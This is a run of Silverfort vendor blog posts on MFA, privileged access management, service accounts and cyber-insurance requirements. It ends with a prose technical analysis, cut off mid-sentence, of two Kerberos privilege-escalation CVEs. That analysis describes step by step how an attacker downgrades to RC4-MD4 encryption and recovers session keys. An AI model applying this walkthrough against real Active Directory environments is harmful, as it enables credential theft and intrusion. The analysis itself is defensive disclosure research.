Threat Detection Screen Active MFA Protection GitHub will require MFA by the end of 2023, if not sooner. Enable MFA using Okta for all SaaS apps. Extend your MFA solution to all on-prem AD authenticated apps. Utilizing the Silverfort–Okta integration provides a rapid and safe way to keep your environment secure against any potential identity threats that will result from this breach. --- - Published: 2022-12-08 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/revolutionizing-work-at-silverfort-with-chatgpt/ At Silverfort, we’re always looking for ways to improve our work and make it more efficient. Recently, we started using ChatGPT internally and have already seen significant changes in how we do things.   For those who aren’t familiar, ChatGPT is a natural language processing (NLP) AI that can generate human-like text. It’s been used in a variety of applications, from chatbots to content creation. We’re exploring what we can do with it and have already found several ways to incorporate it into our work.   One of the first things we tried was using ChatGPT to improve our interviews. We let it solve a programming interview and were impressed with the results. While the solution wasn’t as good as that of a top engineer, with some guidance, ChatGPT gave a pretty good answer.   We also tried using ChatGPT in a security researcher interview. While it wasn’t able to find the specific vulnerabilities we were looking for, it did point out other potential vulnerabilities in the code that we were unaware of. This shows the potential of ChatGPT to help identify weaknesses in our systems and improve our security.   Another area where we’ve seen significant benefits is in writing blog posts. Using ChatGPT, we’ve been able to save an estimated 70% of the time it would normally take to write a post. This has allowed us to produce more content in less time and free up our team to focus on other tasks.   We’ve also used ChatGPT to figure out how to integrate with other products and for competitive analysis. In the IT department, it was used to find a solution for controlled and secure partner access to certain systems. And in other departments it was used to write follow-up emails and rephrase answers to security questionnaires.   It’s only been 24 hours since we started using ChatGPT, but we’re already seeing the potential for it to greatly improve our work at Silverfort. I can only imagine what the next few months will bring as we continue to explore its capabilities.   Of course, there are some caveats to using ChatGPT. It can be overconfident and doesn’t always produce content that’s correct, so everything it generates needs to be reviewed. But overall, we’re very happy with the results we’ve seen so far and are excited to see what else it can do for us.   And as a final note, ChatGPT was also used to write this blog post, showcasing its ability to generate human-like text for a variety of purposes. We’re looking forward to seeing what else it can do for us at Silverfort.   --- - Published: 2022-11-29 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/how-to-accelerate-the-privileged-access-management-journey/ A robust PAM solution in place deprives threat actors of the ability to utilize compromised admin credentials for malicious access and enables organizations to ensure that those who need privileged access get it in a secure manner. However, due to its lengthy and complex deployment time, PAM programs can often stretch over months and even years and in many cases are never fully completed. A prominent reason for this complexity is the low to partial visibility identity teams have into the privileged accounts in their environment, especially in machine-to-machine service accounts. This post explores this challenge and its implications and shows how Silverfort’s ability to automate the discovery, monitoring, and protection of service accounts enables organizations to successfully take their PAM programs to the finish line. The PAM Promise: Real-Time Protection of Privileged Accounts Privileged Access Management (PAM) solutions have become a key part of a successful cybersecurity strategy. PAM prevents adversaries from utilizing compromised privileged accounts for lateral movement and malicious access, by providing these accounts with a dedicated protection layer. It delivers this protection by employing various security measures such as personalization of user access, creation of temporary access accounts, control of the access and use of shared accounts, automated password management, and management of visibility of connections made by users with privileged access rights. All of these enable PAM solutions to provide real-time protection, preventing identity threats from taking place, rather than merely alerting and maintaining access to critical systems, servers, and databases guarded and secure. However, the deployment process of PAM solutions entails severe challenges that often bar these security advantages from taking place in practice. Partial Visibility into Privileged Accounts Prevents PAM Solutions from Delivering on their Promise PAM solutions revolve around placing additional protection on your privileged accounts. The caveat is that there is an implicit assumption that you already know who these accounts are. Unfortunately, this is hardly the case, and the common reality is quite the opposite. IAM solutions don’t provide an easy and straightforward way to comprehensively discover all privileged accounts in a given environment. This problem further intensifies in the case of service accounts that cannot be vaulted without the accurate mapping of their dependencies, interacted systems, and supported apps. Placing them in the vault and rotating their password without having this knowledge would likely result in breaking the systems and apps that are using them. So, the only way in which service accounts can gain PAM protection is by acquiring this knowledge manually. As any member of the identity team will tell you, this task ranges from extremely complex and resource-consuming to downright impossible in most environments. The Double Visibility Challenge of Service Accounts: Who they Are and What they do Service accounts introduce two unique visibility challenges. First, there is no straightforward way to efficiently filter them from the human-associated accounts. Second, even when a service account is identified as such, there is no easy way to know its dependencies, the machines it connects to, and the application it supports. The root cause of the visibility challenges with service accounts is due to the following creation and usage patterns: Misuse of admins that use their own credentials for machine-to-machine access. Misuse of admins that use service accounts interactively. Bad practice of sharing the same service account between various applications, Lack of documentation on the service account’s creation, either when the accounts are created by installed software, or manually by admins to automate management tasks. All the above patterns result in organizations having partial visibility into their service accounts. Failure to know that a service account exists or how it is used prohibits organizations from vaulting and applying password rotation to the service accounts, leaving them exposed to compromise. Silverfort Eliminates all Visibility Gaps to Accelerate PAM Journeys and Take them to the Finish Line Silverfort Unified Identity Protection platform enables organizations to overcome this PAM deployment hurdle by providing effortless, automated visibility into all privileged accounts, including both human admins and service accounts. This is the first time all the knowledge of the service accounts’ inventory, type, behavior, and machine interaction is made available without effort, providing identity teams with the ability to make an informed decision about what service account to place in the PAM’s vault and subject it to password rotation without fear of breaking app performance or operational process the account performs. Even following this discovery, there might be service accounts that could still not be vaulted – for example, ones that are hardcoded in legacy systems – and would also need protection. Silverfort enables them to protect these accounts with dedicated access policies that would block their access when abused by attackers. The Silverfort Four Steps PAM Acceleration Path Here are the four steps you can implement with Silverfort to accelerate the PAM program without delaying the deployment process: Privileged and Service Accounts Discovery Discover all admin accounts (including Shadow Admins) and service accounts (including undocumented or misclassified ones) and gain real-time insights into their access attempts, authentications, and risk level. Account Dependencies Mapping Leverage Silverfort’s automated discovery of privileged accounts and visibility into all their authentication and access activity to easily map all the sources and destinations where they are used, including hidden apps, processes, scheduled tasks, etc. PAM Onboarding After completing the discovery and dependency mapping (which takes place automatically within a few weeks), use this information to properly onboard all admin users and service accounts to the PAM vault without causing operational disruption. Enforcing Complementary Controls Apply access policies for the onboarded accounts to protect against PAM bypass attacks, as well as for any admin and service accounts you’ve decided not to vault, ensuring that all your privileged accounts are resilient to compromise. Organizations that implement these four steps in their PAM program can rest assured that all their privileged accounts are now protected. To learn more about how Silverfort can help accelerate your PAM program, request a demo here. --- - Published: 2022-11-22 - Modified: 2025-04-14 - URL: https://www.silverfort.com/blog/the-security-risks-of-service-accounts-why-cyber-insurance-underwriters-are-tightening-requirements/ As ransomware attacks continue to skyrocket, both in frequency and intensity, underwriters of cyber insurance policies have been dramatically tightening their requirements in order to stem financial losses. Over the past three years, for example, the number of claims related to cyberattacks has doubled, with insurance companies posting a record-high 72% cyber loss ratio in 2020. Meanwhile, ransomware attacks rose 105 percent last year, up to 623. 3 million attacks globally, with the average payout now costing $570,000.   In response, insurers have been revamping their cyber insurance policies to be much more specific about which security controls must be in place. The first major change came last year, when companies began mandating that multi-factor authentication (MFA) controls be enforceable across numerous systems in the environment, including cloud-based email, remote network access, as well as admin access to directory services, backup environments, and network infrastructure. Recently, underwriters have gone one step further, with many of them also requiring that all privileged accounts be protected.  This post examines why insurance companies are now focused on these accounts in general and specifically on a subset of privileged accounts: service accounts. The Link Between Ransomware Attacks and Service Accounts Threat actors have increasingly been using a particularly stealthy tactic to move freely across an environment: lateral movement. Lateral movement is the stage of an attack that comes after initial access, where attackers make use of compromised user credentials to access as many machines as possible in order to maximize the attack’s payoff by encrypting multiple machines simultaneously. Successful ransomware attacks often make use of a compromised service account, which is a non-human account used for machine-to-machine (M2M) communication that performs a critical process (such as a network scan or a software update) repeatedly and automatically. These accounts are very attractive targets for attackers since they are usually highly privileged, with admin-level access to numerous systems.   Several recent high-profile cyberattacks, in fact, have involved a compromised service account, including the SolarWinds Hack of 2021 and the Uber Breach earlier this year. Security Challenges of Service Accounts  Service accounts are especially vulnerable to compromise for two important reasons. First, they often have low visibility, since there is no diagnostic tool that can discover them and monitor their behavior. Second, service accounts are typically excluded from password rotation as they are often embedded within scripts. The upshot is that once one of these accounts is compromised, an attacker will be able to move around an environment undetected and for an unlimited amount of time. This is exactly why insurers are concerned about service accounts have recently started requiring companies to conduct inventories as well as put in place specific security measures to prevent attackers from using them for malicious access. The New Requirements to Obtain a Cyber Insurance Policy Among the requirements companies must now meet are the following:  There is an inventory of all privileged service accounts, updated at least quarterly – including what each service account is used for and why it requires domain admin entitlements Service accounts are tiered so that different accounts are used to interact with workstations, servers, and authentication servers Service accounts are configured using the principle of least privilege and to deny interactive logins There is a process in place to regularly review the requirements for each privileged service account to verify it still requires permissions that it has There are steps being taken to mitigate any exposure the service accounts’ configuration creates that could result in credential harvestingSpecific monitoring rules are in place for service accounts to alert the Security Operations Center (SOC) of any abnormal behavior  These requirements present serious challenges to companies seeking a new (or looking to renew an existing) cyber insurance policy. As mentioned, there is no utility that can generate a report of all current service accounts, which means organizations may find it impossible to produce an accurate count of them and demonstrate a full accounting of their behavior. But even for companies with up-to-date records, configuring specific policies to monitor all service account behavior would be extremely labor-intensive and a huge drain on IT resources. Furthermore, putting steps in place to protect service accounts from compromise is complicated at best, since rotating the passwords of service accounts can break critical processes.   How Silverfort Enables Companies to Meet the Service Account Requirements Fortunately, the Silverfort Unified Identity Protection platform was developed to address exactly these issues – and can help companies meet the cyber insurance requirements for service accounts. Silverfort gives companies the ability to automatically discover and secure all service accounts in the environment via an AI-engine that detects any account that displays repetitive, machine-like behavior. Once detected, Silverfort can then continuously monitor those accounts and all the places they authenticate to, providing security teams with real-time insights into their activity and level of risk. Silverfort also comes with ready-to-use access policies tailored to each service account based on its specific pattern of behavior, with any deviation immediately detected and resulting in either blocked access or an alert sent to the SOC team – thus preventing threat actors from using them in lateral movement attacks. In addition to rule-based policies, adaptive risk-based policies can be easily created to activate as the risk level of an account increases. This level of granular protection means that service accounts can be fully protected without rotating passwords, which can break mission-critical processes. Here is a summary of the capabilities Silverfort provides around service accounts: With Silverfort in place, organizations will find meeting the new requirements around service accounts to be painless and straightforward, allowing them to qualify for a cyber insurance policy and regain peace of mind. To learn more, request a demo here. --- - Published: 2022-11-17 - Modified: 2025-04-16 - URL: https://www.silverfort.com/blog/cyber-insurance-mfa-5-things-every-broker-should-know/ The surge in ransomware attacks has led leading underwriters to raise the bar for renewal or purchase of cyber insurance policies. Customers are now required to deploy various security measures - such as Multi-Factor Authentication (MFA). As a result, cyber insurance brokers - the ones that actually sell the policies– are tasked with finding an MFA solution that can both satisfy underwriters’ requirements as well as be easily adopted by their customers. However, this is not as easy task as one might think. This article provides brokers with a definitive list of questions they should ask themselves when choosing the MFA solution they'll recommend to their customers. If the answer to all of them is ‘Yes’, the solution is good to go.   Are you a broker reading this article? If so, let’s start! The Cyber Insurance MFA Companion to Choosing the Right Solution If you’re a broker and you want to sell cyber insurance policies, you must make sure that MFA is deployed in the customer’s environment. And the best way to do that is to have an MFA solution that you can recommend them. In theory all you need to do is to randomly choose one of the multiple MFA solutions in the market. In practice, however, it’s not that easy because not all MFA solutions are equal. In fact, it’s extremely important for you to choose the right MFA solution. A wrong MFA solution, for example, might be too hard to deploy in your customer’s environment, or won’t be able to provide adequate protection. The wrong MFA solution can harm you in two ways. The more straightforward way is by not satisfying your underwriter’s security requirements – making the customer ineligible for a policy. The other – and possibly worse for you – is that you’ll succeed in selling the policy, but your customer will fall victim to a ransomware attack, resulting in a policy claim for which your underwriter will hold you accountable. So how can you single out the best-fit MFA solution for your customers? Here are the top 5 considerations you should bear in mind when choosing your MFA. # 1 Can the MFA solution be deployed seamlessly and rapidly? This might come to you as a surprise, but the most important feature of security products is their ease of use, starting from the initial deployment. The rule of thumb is that everything that takes more than a week to get started will end up not implemented at all. So first and foremost, check whether the MFA vendor can vouch for a fast and sleek deployment process. If the answer is positive, you can proceed to the next item. #2 Does the MFA solution cover the internal environment? This is a classic ‘fine print’ catch. The underwriter says the customer must have ‘MFA’. Now, all MFA solutions without exceptions can be used for remote connection to the customer environment. However, that’s not all your underwriter wants. If you take a closer look into the assessment’s form tables and checklists, you’ll discover that significant attention is given to connections that take place within the internal environment itself. Not all MFA solutions support this. So, make sure that the one you’re evaluating as a recommendation to your customers applies to internal environment use cases- for example, a user that access a file server from his/her computer, or opens a file on a shared network folder. #3 Can your customer apply the MFA solution to privileged users’ access? Your underwriter’s goal by requiring MFA is to reduce the likelihood of a successful ransomware attack. Ransomware threat actors would typically strive to compromise the accounts of your privileged users, since this will easily pave their way to any resource in the targeted environment. As a result – and that’s more fine print you should consider- your underwriter is especially concerned about the protection of your customers’ privileged users and the ability to easily discover who these users are and apply MFA protection to them. The solution you choose must be able to support that. #4 Is the MFA solution capable of protecting command-line access? This question relates again to the underlying root cause for which underwriters had started to require MFA in the first place – to nullify attackers’ ability to utilize compromised user credentials to access resources in your customers’ environment. It's important for you to know that there are multiple ways in which this access can be carried out. Some are trivial to protect with MFA, such as Remote Desktop Protocol (RDP), but others are beyond the scope of most commercial MFA solutions, like command-line based tools such as PowerShell and PsExec. Not surprisingly, these are the access methods threat actors prefer to employ, so your MFA solution of choice must be able to cover them as well. #5 Can you enforce it on 100% of authentications and access attempts? When sailing a boat, a single crack in its hull can sink it even if the rest of it is whole and intact. Your customers are required to have MFA across 100% of their assets. Anything less than that means a likely breach. The MFA solution you should pursue must have the ability to vouch for complete coverage to satisfy your underwriter’s requirements, and the ability to reach this coverage in a rapid and easy manner. Silverfort MFA – One Solution for all Cyber Insurance Requirements Silverfort has pioneered the first Unified Identity Protection platform that can enforce MFA protection across all users, systems, and environments. Silverfort MFA has been embraced by top underwriters and hundreds of customers that sought to renew their existing cyber policies or purchase new ones. The following table shows how Silverfort addresses all the key capabilities underwriters require: Offering Silverfort to your customers is the safest and most rapid path to add another customer’s cyber policy purchase to your portfolio.   Visit our website to learn more about Silverfort’s MFA protection for cyber insurance or download this eBook to learn more. --- - Published: 2022-11-10 - Modified: 2025-04-16 - URL: https://www.silverfort.com/blog/silverfort-your-one-stop-mfa-solution-for-cyber-insurance-compliance/ The past couple years have brought major changes to cyber insurance policies. Notably, almost all brokers are now requiring multi-factor authentication (MFA) across on-prem and cloud resources. This introduces a severe challenge to small and mid-sized organizations, since standard MFA solutions cannot deliver the required coverage and deploying a PAM solution is typically beyond the scope of their operational capacity and security skillset. The Silverfort Unified Identity Protection platform is the only solution that can consolidate compliance with the full cyber insurance MFA requirements checklist, without requiring agents or proxies, making it an ideal choice for any organization that seeks to purchase or renew its cyber insurance policy. What is MFA and what are its benefits? Multi-factor authentication, commonly referred to as MFA, is a security measure that adds an additional layer of protection to the traditional username-password combination. It requires users to provide multiple forms of verification, such as something they know (e. g. , a password), something they have (e. g. , a mobile device), and something they are (e. g. , biometric data). Implementing MFA offers a wide range of advantages that significantly enhance cybersecurity. Let's explore these benefits in detail: Strengthened Authentication: MFA greatly enhances authentication security. By requiring multiple forms of verification, attackers are considerably more challenged to gain unauthorized access. Even if a password is compromised, the additional factors serve as an additional barrier, to protecting sensitive information. Mitigation of Credential-Based Attacks: In the cyber threat landscape, password breaches and credential theft are all too common. MFA plays a crucial role in mitigating such attacks. Even if an attacker obtains user credentials, they would still need the additional factors to successfully complete the authentication process, effectively thwarting unauthorized access attempts. Defense against Phishing: Phishing attacks, in which cybercriminals deceive users into divulging their credentials, pose a significant threat. Against such attacks, MFA serves as a powerful defense mechanism. Even if users unknowingly disclose their passwords, the additional authentication factors prevent attackers from progressing further, safeguarding sensitive data. Compliance with Regulations: Various industries and government organizations have implemented rigorous data protection regulations. MFA is often mandated as a security measure to comply with these regulations. By implementing MFA, organizations demonstrate their commitment to meeting compliance standards and protecting valuable information from unauthorized access. Enhanced User Experience: While prioritizing security measures, user experience is essential. Modern MFA solutions offer seamless and user-friendly experiences. With intuitive interfaces and various authentication methods, such as push notifications or biometrics, the authentication process becomes convenient for users without compromising security. Safeguarding Cyber Insurance Policies: MFA plays a vital role in the context of cyber insurance. Insurers recognize the effectiveness of MFA in reducing the risk of cyber incidents. As a result of implementing MFA, organizations demonstrate their proactive approach to strengthening their security posture, which may lead to more favorable insurance terms. Why do insurers require Multi-Factor Authentication (MFA)? Organizations are now required by cyber insurers to adopt MFA as a fundamental component of their policies. This requirement is derived from the fact that MFA's technology is capable of strengthening security, mitigating risks, demonstrating a commitment to security, complying with industry standards, and addressing emerging threats. Through the mandate of MFA, insurers aim to promote proactive risk management and encourage organizations to adopt robust security measures in order to protect themselves from cyber attacks. Implementing MFA not only aligns with insurers' risk management strategies but also helps organizations enhance their overall security posture in an increasingly complex cyber landscape. The Cost of a Cyber Attack vs. The Cost of a Cyber Insurance Policy Understanding the potential financial impact of a cyberattack and weighing it against the cost of a cyber insurance policy is crucial for making informed decisions. There are several factors that contribute to the financial consequences of a cyber attack, including: Direct Financial Losses: This includes expenses related to system recovery, data restoration, and potential ransom payments. In addition, it encompasses financial losses resulting from business interruptions, including revenue loss or diminished customer trust. Legal and Regulatory Consequences: Following a cyberattack, organizations may face legal and regulatory consequences. Including legal defense costs, regulatory fines, penalties, and any potential lawsuits from affected parties. Reputational Damage: A cyberattack can severely damage an organization's reputation, leading to a loss of customer trust and loyalty. Rebuilding a brand's reputation can be a complicated and costly process, requiring public relations efforts, marketing campaigns, and outreach initiatives to customers. Incident Response and Remediation: Organizations must invest in incident response capabilities, forensic investigations, and remediation efforts to identify the attack's root cause, mitigate further damage, and strengthen security measures. These activities often require specialized expertise and can be financially burdensome. Simultaneously, the cost of a cyber insurance policy varies based on several factors, including the insured organization's size, nature, security posture, industry sector, and coverage limits. Other factors that influence policy costs include: Risk Assessment: Insurers conduct risk assessments to evaluate an organization's security gaps to cyber threats. A number of factors are taken into account, including security controls, multifactor authentication, incident response capabilities, and historical breach data. Due to their increased exposure, higher-risk organizations may be subject to higher premiums. Coverage and Limits: The breadth of coverage and policy limits affect the insurance policy cost. The premiums for policies that provide comprehensive coverage, including business interruption, legal expenses, and reputational damage, are generally higher. Higher policy limits also contribute to increased costs. Loss History: An organization's previous history of cyber incidents plays a role in determining policy costs. Organizations with a track record of frequent or severe cyber incidents may face higher premiums due to the perceived higher risk. Risk Management Measures: Insurers assess the effectiveness of an organization's risk management measures, including security controls and incident response protocols. Organizations with robust security practices may be eligible for discounts or lower premiums. Investing in a cyber insurance policy provides financial protection in the event of a breach. It includes mitigating direct financial losses, legal expenses, and reputational damage. Furthermore, it provides access to resources such as incident response teams and legal expertise, which can be extremely valuable during a cyber crisis. By carefully evaluating the potential financial impact of a cyberattack and considering the costs and benefits of a cyber insurance policy, organizations can make well-informed decisions to protect their interests. The Cyber Insurance Landscape While cyber insurance is of course a pivotal element in ensuring your company is able to recover from a cyber attack, an overlooked benefit is that the prerequisites required for cyber insurance compliance can help prevent attacks from occurring in the first place. As a response to the massive 245% uptick in ransomware attacks in 2021 (causing $21 billion in losses in the US alone), cyber insurance companies are taking greater precautions by rolling out a detailed list of new requirements for cyber liability compliance. In particular, a new set of MFA guidelines is now being required by the top cyber insurance providers, using the following MFA form: The common notion within IT and security teams is that fully complying with this checklist is more than challenging. Let’s take a closer look to understand why. Cyber Insurance Coverage: MFA Checklist MFA for Office 365 and other Cloud-Based Email - Easy to Find Most cloud-based email providers, such as Office 365, offer MFA functionality, often as a native component of their product. Even when that’s not the case, adding MFA protection to SaaS or web application is a trivial task. MFA for VPN Access - Easy to Find For VPN connections, adding MFA is quite simple. If the VPN provider itself doesn’t have an MFA option, any LDAP or RADIUS-enabled VPN can have MFA added via a 3rd party provider. MFA for all Remote and Internal Admin Access – Problematic Here is where complying with the requirements becomes more complicated. While standard MFA solutions can cover some of these use cases, none can cover all of them. Let’s explore each of these sub-requirements: MFA for AD, MFA for PowerShell, MFA for PsExec – Partial Availability Only Industry-leading MFA solutions deliver only partial protection for remote access to on-prem directory services. While there are available MFA products for RDP access, none can cover command line tools such as PsExec, PowerShell, or WMI, creating a critical gap in both actual protection as well as complying with the cyber security insurance requirements. MFA for all Network Backup Environments – Partial Availability Only Dedicated backup solutions, whether in the form of virtual appliances or cloud storage, typically support MFA. However, if the backup environment is in an on-prem server it is subject to the same limitations we’ve just described - in fact, there have been various ransomware attacks lately in which these servers themselves were hit and encrypted. MFA for Access to Network Infrastructure (routers, switches, firewall, etc. ) – Partial Availability Only In the case of routers and switches, the question is whether they can interface with RADIUS/TACACS+ - if so, adding MFA is rather simple. However, if your infrastructure doesn’t support these interfaces then it’s too bad - it might be time for an upgrade. Regarding firewalls, most modern firewalls also support the addition of MFA to the authentication process so there should be no problem here. MFA for Active Directory-Managed Endpoints/Servers – Partial Availability Only The problem here is similar to the one with MFA for directory services - there is no available solution that can enforce MFA on Active Directory-managed endpoints and servers. There is the single exception of RDP and local login, but no such protection exists to the command line remote access tools we’ve outlined above. PAM Solutions are Out-of-Scope for Small to Midsized Organizations It may be that the drive behind the new MFA checklist was to push organizations to adopt a Privileged Access Management (PAM), assuming this approach would raise their protection level and increase their resilience against cyberattacks. However, when surveyed about reasons they don’t use PAM in their organizations, IT and cybersecurity analysts most commonly pointed out the heavy burden entailed in PAM’s cost of implementation, maintenance and ongoing operation. In other words – PAM is out of scope for small to mid-sized enterprises. So, while in theory PAM could have delivered the protection insurers seek for their insured customers, it’s not a practical cyberattack insurance solution in real life. Silverfort: The Catch-All MFA Solution While standard MFA solutions are able to cover some of the use cases required by cyber insurance, none can protect all of them. Since insurers themselves state ransomware as one of their top concerns, we’ll use it to demonstrate this claim – ransomware propagates in attacked networks by utilizing command line tools like PsExec, Powershell and others. No other MFA solution can cover these access interfaces. The Silverfort Unified Identity Protection platform is the only solution that enforces MFA from the backend of identity providers rather than by agents or proxies on the individual resources. In practice this means that Silverfort can protect with MFA any user account that authenticates to an on-prem or cloud directory in the environment. Not only does Silverfort protect internal and remote admin access in the on-prem environment (which no other solution does), but it also enables customers to consolidate all their MFA protections in a single solution, making it a natural answer to cybersecurity compliance standards. Bottom Line: MFA Authentication Across All Your Resources Will Make You More Secure We get it - cyber security insurance renewals are always frustrating, and especially now that providers have added so many new requirements for compliance. Between deciphering the vague wording of these prerequisites, finding solutions to protect every company asset with MFA, and getting users on board with large scale changes, it’s no small ordeal - especially in the short timeframes given by cyber liability providers. On the other hand, these changes signal a substantial shift towards a future where enterprises are much better prepared against cyberattacks. Implementing MFA across all resources in the organization is a huge step towards a better security posture. And... --- - Published: 2022-11-09 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/the-mfa-blind-spot-of-legacy-applications/ Despite the surge over the past few years to move all resources to the cloud, the use of legacy, on-prem applications isn’t disappearing. In a typical enterprise, these applications support the day-to-day operational processes in almost all verticals from finance and manufacturing to healthcare and hospitality. While legacy applications are vital for organizations to function, they do introduce security risks. One of the most prominent ones is in the identity attack surface, as legacy applications typically don’t support MFA protection. This makes legacy applications a gaping blind spot in organization’s security architecture, exposing its sensitive data to any threat actor that obtains compromised user credentials. This post examines the identity security implications of legacy applications and how to fix the MFA blind spot with these applications. What are Legacy Applications? The typical organization uses many different types of applications to run its day-to-day operations. A considerable amount of these applications is known as ‘legacy’, which – while based on older technologies – are still part of the organization’s operations. In many cases, the operational overhead and cost of migrating these applications to the cloud is too high, making them a permanent on-prem resource. Also, they introduce various security issues as they were not designed for today’s security controls and best practices. From the identity protection aspect, legacy applications do not support MFA protection, making them exposed to threat actors that employ compromised credentials in their attacks. This MFA gap creates a blind spot in organizations’ security architecture, preventing them from efficiently protecting the sensitive data in these apps and the operational continuity that relies on them against incoming attacks. This risk is now increasingly drawing security stakeholders’ attention to the need of comprehensive MFA protection for legacy applications. Why Can’t Legacy Applications be Protected with MFA? Legacy applications were developed long before MFA technology was widely available, so they don’t natively support its implementation in their default authentication process. To integrate MFA into a legacy application, organizations would need to make changes on the application’s code which could cause friction to their operational continuity. It is therefore not considered to be a viable option by most organizations. Moreover, legacy applications typically authenticate to Active Directory over NTLM and Kerberos protocols, which – unlike modern authentication protocols that SaaS and web applications use – also don’t support MFA. This leaves legacy applications without a practical MFA protection option. Lack of MFA on Legacy Apps Exposes Organizations to Data Loss and Disruption of Operations MFA is the most effective security measure in blocking threat actors from using compromised credentials for malicious access.  According to Microsoft, MFA can block over 99. 9 percent of account compromise attacks. The steep increase in this type of attack – which is seen in 82 percent of data breaches and ransomware attacks – makes the lack of MFA protection for legacy apps a critically exposed attack surface. How does this exposure translate to an actual scenario? Once a threat actor has infiltrated a targeted environment and compromised a set of valid credentials, they'll gain uninterrupted access to the legacy apps and all they contain. This access would be followed by either exfiltration of sensitive IP or extortion under threat of shutting down operations. Furthermore, not placing MFA protection for legacy applications can create compliance issues for organizations that seek to meet their industry’s regulatory frameworks and cyber insurance requirements.   Current Identity Protection Alternatives are Not Enough Some organizations attempt to compensate for the deficit in MFA coverage by closely monitoring users’ access and activity on their legacy apps to capture any anomalies that might indicate a compromise. However, this approach has two main flaws. First, it is reactive by nature, always responding to detected threats rather than preventing them. Secondly, it is extremely resource heavy, requiring a manual integration of the legacy app to an SIEM or some other centralized log collector, as well as a fully staffed security team to perform the actual monitoring. This makes it an impractical choice for most organizations. As we’ve explained before, rewriting the apps’ code or migrating them to the cloud is also not an option. So, it seems we've reached an impasse: on one hand MFA is required, but on the other it seems impossible. How can that be solved? The Solution: Silverfort’s Unified Identity Protection MFA Silverfort has pioneered the world’s first Unified Identity Protection platform that extends MFA and modern identity security to any user and resource, including the legacy applications that couldn't be protected before. This architecture obviates the issue of whether the application natively supports MFA or not, because the only thing that matters is if it authenticates to AD. If it does – which is the case for most to all of legacy applications - than Silverfort can analyze it, trigger MFA if needed, and pass the verdict to AD as we’ve explained above. Once the Silverfort platform is installed in the environment, Active Directory forwards every incoming access request for risk analysis prior to allowing or denying access. Silverfort‘s risk engine inspects the access attempt and determines if it can be trusted or if MFA verification is required. If further verification is needed, Silverfort connects to the MFA service – either its own or any third party one – and challenges the user to prove its identity. Based on the response, Silverfort tells AD whether the access request can be trusted or not. In this way, Silverfort overcomes all the challenges we’ve described in the previous sections: It doesn’t require any code changes to the app itself. It doesn’t require installing any agents on the app’s servers. It covers all access attempts that utilize Active Directory. It provides proactive, real-time prevention of any attempt to use compromised credentials to access the legacy app. Learn more about MFA blind spots and how to protect them in Silverfort’s eBook: Re-evaluate your MFA Protection. --- - Published: 2022-10-31 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/technical-analysis-of-cve-2022-33679-and-cve-2022-33647-kerberos-vulnerabilities/ Written by Yoav Iellin and Dor Segal, Researchers at Silverfort Microsoft’s September 2022 Patch Tuesday included two high-risk elevation of privilege vulnerabilities in Kerberos, that were discovered by Google Project Zero. The two vulnerabilities take advantage of the ability to force Kerberos do downgrade its encoding from the default AES encryption to the outdated MD4-RC4. Once the encryption is downgraded the two vulnerabilities come into play and enable an attacker to abuse weaknesses in the MD4-RC4 encryption. The first one, CVE-2022-33679, allows an attacker to obtain an authenticated session on behalf of the victim which can lead to arbitrary code execution. The second one, CVE-2022-33647, allows an attacker that has already succeeded in performing a Man-in-the-Middle attack to issue any Kerberos service tickets on behalf of the target user, thus gaining the same privileges as the user. It’s important to note that while both vulnerabilities target weaknesses in the legacy MD4-RC4 encryption, each one abuses a different weakness, resulting with different prerequisites and attack scenarios. This article includes a detailed technical analysis and explanation on both CVE-2022-33679 and CVE-2022-33647. CVE-2022-33679 - Vulnerability Analysis The vulnerability CVE-2022-33679, for which a proof of concept was recently released, resides in how Kerberos encrypts its session key and is made possible by Kerberos’ use if the outdated RC4-MD4 encryption type. The attack consists of two parts A) requesting new TGT ticket using the RC4-MD4 etype followed by B) a byte by byte breaking of the keystream. Exploitation process: Obtain the TGT ticket by send AS-REQ packet to the KDC server. the request must ask for the RC4-MD4 encryption type. In order for the attack to succeed, the two following requirements must be met: Explicitly downgrade Kerberos the encryption from its default AES ot the weaker RC4-MD4. This makes the attack possible because its key is only 8 bytes with no IV or salt. The user’s object “Do not require Kerberos preauthentication” flag enabled. This enables to obtain a TGT with an encrypted session key without the need to know the user’s password. Pre authentication is a mechanism where the client encrypts the current timestamp with the entered password and sends it to the KDC where it validates the password’s integrity before generating a session key and a TGT. Because of the “Do not require Kerberos preauthentication” flag the KDC can be targeted directly and does not require any special attacking technique such as Man In The Middle. After the attacker successfully obtains an encrypted ticket, the AS-REP packet consists of an encrypted TGT session key which is 40bit long. Using the outdated RC4-MD4 encryption type, the attacker can leverage its knowledge of the fixed start of the encrypted packet to extract 45 bytes of the key stream. Now the attacker can use this keystream to re-encrypt and request a TGT ticket from the KDC with a custom-made pre-authentication that will be used to verify wether the key stream is correct and break the rest of the following 40bit TGT session key byte by byte. This is done by abusing two weaknesses in the ASN. 1 protocol used for Kerberos encoding, to leverage the attacker’s limited control of the pre authentication field size: The KDC parser ignores NUL terminated strings at the end of the object. This enables us to add a NUL character at the end of the KerberosTime object. This will work for a single byte guessing, but we still need to guess additional four ones. The KDC parser does not validate encoded lengths’ length. ASN. 1 string lengths is represented by 1-4 bytes and the KDC ASN. 1 parser doesn’t enforce the shortest way. Therefore, we can represent our timestamp string length with a size of 1-4 bytes as we wish. It means we can enlarge even further the length of the plain text and push the NUL byte to the next position and guess the next byte of the keystream. Lastly, the attacker can re-encrypt the timestamp and validate each guess by sending an AS-REQ with encrypted pre authentication and will receive an error if the encrypted preauth date is incorrect. In case the pre authentication succeeded, the attacker is able to discover another byte from the keystream as there are up to 256 guess options for each byte. Repeating this process allows obtaining all of the required key stream bytes to decrypt the session key stored in the original ticket. The obtained session key gives the attacker the ability to request a ticket to any SPN on behalf of the targeted user. Flow of breaking the first byte of the AS-REQ session key using CVE-2022-33679. Should be followed by remaining bytes Continued attack flow, breaking last byte and obtaining new TGT using the broken session key Credit: POC by James Forshaw and Rubeus by GhostPack CVE-2022-33647 Technical Analysis Fortunately for the attacker, CVE-2022-33647 vulnerability works with pre authentication, unlike CVE-2022-33679. This is important because pre-auth is enabled by default for every created object in Active Directory. The major requirement for this attack is a Man-In-The-Middle between the client and the domain controller (This attack type is common and there are many ways to achieve it like DNS spoofing, ARP Poisoning etc. ). The MITM is used to force the client to downgrade the encryption to MD4-RC4. Exploitation flow When the first AS request is sent from the client, the KDC responds with ‘pre-auth is required’ message. However, the attacker can alter the response of the KDC because at this stage of the authentication there is no verification. We 